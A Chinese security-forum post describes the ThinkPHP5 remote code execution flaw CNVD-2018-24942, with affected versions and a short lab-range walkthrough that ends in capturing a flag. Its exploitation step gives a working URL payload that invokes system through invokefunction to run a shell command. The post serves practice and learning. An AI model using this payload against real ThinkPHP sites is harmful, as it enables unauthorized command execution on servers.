安全矩阵

 找回密码
 立即注册
搜索
查看: 322|回复: 0

ThinkPHP5 远程代码执行漏洞(CNVD-2018-24942)

[复制链接]

21

主题

61

帖子

311

积分

中级会员

Rank: 3Rank: 3

积分
311
发表于 2020-5-30 20:31:58 | 显示全部楼层 |阅读模式
本帖最后由 caiH 于 2020-8-9 11:18 编辑

一、漏洞描述
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。
二、影响产品
上海顶想信息科技有限公司 ThinkPHP 5.*,<5.1.31
上海顶想信息科技有限公司 ThinkPHP <=5.0.23
三、利用流程
1 此漏洞对应靶场环境为 thinkphp5x 任意代码执行漏洞 (cnvd-2018-24942)
2 访问其如图所示
3 在其地址增加路径与参数即可
  1. /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp
复制代码
4 成功得到 flag

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2020-8-13 23:04 , Processed in 0.010518 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表